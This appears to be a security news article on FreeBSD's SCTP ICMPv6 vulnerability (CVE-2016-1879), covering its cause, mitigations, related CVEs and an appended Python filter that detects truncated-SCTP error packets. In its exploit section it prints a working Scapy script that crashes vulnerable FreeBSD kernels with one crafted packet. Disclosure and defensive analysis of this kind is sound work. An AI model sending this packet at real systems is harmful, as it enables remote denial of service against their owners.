The FreeBSD team has announced a serious vulnerability in its operating system that attackers can exploit for denial of service (DoS), privilege escalation, or theft of sensitive system information.

SCTP ICMPv6 error handling vulnerability (CVE-2016-1879)

SCTP (Stream Control Transmission Protocol) is a transport layer protocol used to carry signaling over IP networks; mobile operators typically use it in their networks. The vulnerability affects several FreeBSD versions: 9.3, 10.1 and 10.2 are all vulnerable if they support SCTP and IPv6, which is the default system configuration. To exploit it, an attacker has to send a specially crafted ICMPv6 message; a successful attempt results in a DoS of the system.

The DoS occurs because the system does not carefully check the SCTP header length when processing an ICMPv6 error message. If the destination of a packet does not exist, a router generates an error message and returns it to the sender via ICMPv6. The ICMPv6 message embeds the original IPv6 packet, whose Next Header field indicates SCTP as the encapsulated protocol.

When the kernel receives an error message delivered via ICMPv6, it passes the upper-layer protocol packet to the corresponding parser, sctp6_ctlinput(). The SCTP parser assumes the incoming header has a valid length and tries to copy it with m_copydata(), using an offset and a byte count. The system expects a header length of 12 bytes, but an attacker can send it an 11-byte header, and the resulting NULL pointer dereference crashes the kernel.

Exploit code

Exploiting this vulnerability does not require opening an SCTP socket.
Scapy makes it easy to build the ICMPv6 packet the exploit needs. The code layout and indentation below have been adjusted by the editor; adapt the code to your own needs:
    import argparse
    from scapy.all import *


    def get_args():
        # Command-line options: target MAC and IPv6 address, plus the sending interface.
        parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
        parser.add_argument("-m", "--dst_mac", type=str, help="the FreeBSD mac address")
        parser.add_argument("-i", "--dst_ipv6", type=str, help="the FreeBSD IPv6 address")
        parser.add_argument("-I", "--iface", type=str, help="Iface")
        options = parser.parse_args()

        if options.dst_mac is None or options.dst_ipv6 is None:
            parser.print_help()
            exit()
        return options


    if __name__ == '__main__':
        options = get_args()

        # ICMPv6 Destination Unreachable whose embedded IPv6 header announces
        # SCTP (Next Header 132) but is not followed by an SCTP header.
        sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() /
              IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'),
              iface=options.iface)

Repair and security advice

To protect your system from this vulnerability, we recommend the following. If you do not need IPv6, disable it. Block ICMPv6 or IPv6 traffic at the firewall. If neither is possible, disable SCTP support in the system kernel, which requires recompiling the kernel. To fix the vulnerability itself, apply the vendor's patch, which adds an extra check to the handling of SCTP ICMPv6 messages; this also requires recompiling the kernel.

Other related vulnerabilities

FreeBSD has also disclosed other serious vulnerabilities, for which the developers have released patches:

1. If TCP_MD5SIG and TCP_NOOPT are both enabled, an attacker can cause a DoS of the system over a TCP connection. A listening socket with TCP_NOOPT enabled is all that is needed to exploit this (CVE-2016-1882, patched).
2. A Robust Futex error under Linux can leak system memory contents (CVE-2016-1880, patched).
3. An insecure default configuration lets an attacker access the daemon configuration file /etc/bsnmpd.conf (CVE-2015-5677, patched).

To protect your system from abuse of these vulnerabilities, we strongly recommend configuring IPv6 securely before using it, and installing appropriate security tools to protect the system.
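The extra check on SCTP ICMPv6 messages that the repair advice describes comes down to verifying that the packet quoted inside the error really carries a full 12-byte SCTP common header before anything is copied out of it. The following is an added example written for this article, not code from the article or from the FreeBSD kernel: a pure-Python inspector, usable as a filter or IDS rule, that classifies an ICMPv6 Destination Unreachable message by that test. It assumes raw IPv6 packets without a link-layer header and without extension headers before ICMPv6; the sample packets are constructed inline with made-up addresses and zero checksums.

```python
import struct

ICMPV6_DEST_UNREACH = 1   # ICMPv6 type 1
IPPROTO_ICMPV6 = 58
IPPROTO_SCTP = 132        # Next Header value announcing SCTP
SCTP_COMMON_HDR_LEN = 12  # src port (2) + dst port (2) + verification tag (4) + checksum (4)
IPV6_HDR_LEN = 40


def check_icmpv6_error(pkt: bytes) -> str:
    """Classify a raw IPv6 packet carrying an ICMPv6 Destination Unreachable.

    Returns 'ignore' for anything that is not an IPv6 + ICMPv6 error quoting an
    IPv6 packet, 'ok' when the quoted packet is not SCTP or carries a complete
    12-byte SCTP common header, and 'truncated-sctp' when the quoted packet
    claims SCTP but has fewer than 12 bytes behind its IPv6 header, the shape
    sctp6_ctlinput() copied from without checking.
    """
    if len(pkt) < IPV6_HDR_LEN or pkt[0] >> 4 != 6 or pkt[6] != IPPROTO_ICMPV6:
        return "ignore"
    icmp = pkt[IPV6_HDR_LEN:]
    if len(icmp) < 8 or icmp[0] != ICMPV6_DEST_UNREACH:
        return "ignore"
    inner = icmp[8:]  # the original packet quoted by the error, starting at its IPv6 header
    if len(inner) < IPV6_HDR_LEN or inner[0] >> 4 != 6:
        return "ignore"
    if inner[6] != IPPROTO_SCTP:
        return "ok"
    if len(inner) - IPV6_HDR_LEN < SCTP_COMMON_HDR_LEN:
        return "truncated-sctp"
    return "ok"


def build_sample(sctp_bytes: bytes) -> bytes:
    """Constructed sample: outer IPv6 -> ICMPv6 dest-unreach -> inner IPv6 (nh=132) -> sctp_bytes.
    Checksums are left zero and the link-local addresses are made up (hypothetical test data)."""
    a = bytes.fromhex("fe80" + "00" * 13 + "01")
    b = bytes.fromhex("fe80" + "00" * 13 + "02")
    inner = struct.pack("!IHBB", 0x60000000, len(sctp_bytes), IPPROTO_SCTP, 64) + b + a + sctp_bytes
    icmp = struct.pack("!BBHI", ICMPV6_DEST_UNREACH, 0, 0, 0) + inner
    return struct.pack("!IHBB", 0x60000000, len(icmp), IPPROTO_ICMPV6, 64) + a + b + icmp


# Constructed inputs: a well-formed error quoting a full SCTP common header,
# and one with Next Header 132 but no SCTP header at all behind it.
GOOD = build_sample(struct.pack("!HHII", 36412, 36412, 0xDEADBEEF, 0))
BAD = build_sample(b"")
```

A packet that is classified as truncated-sctp is exactly the one the patched kernel now rejects before calling m_copydata(), so dropping it at the border makes the unpatched hosts behind the filter unreachable by this trigger.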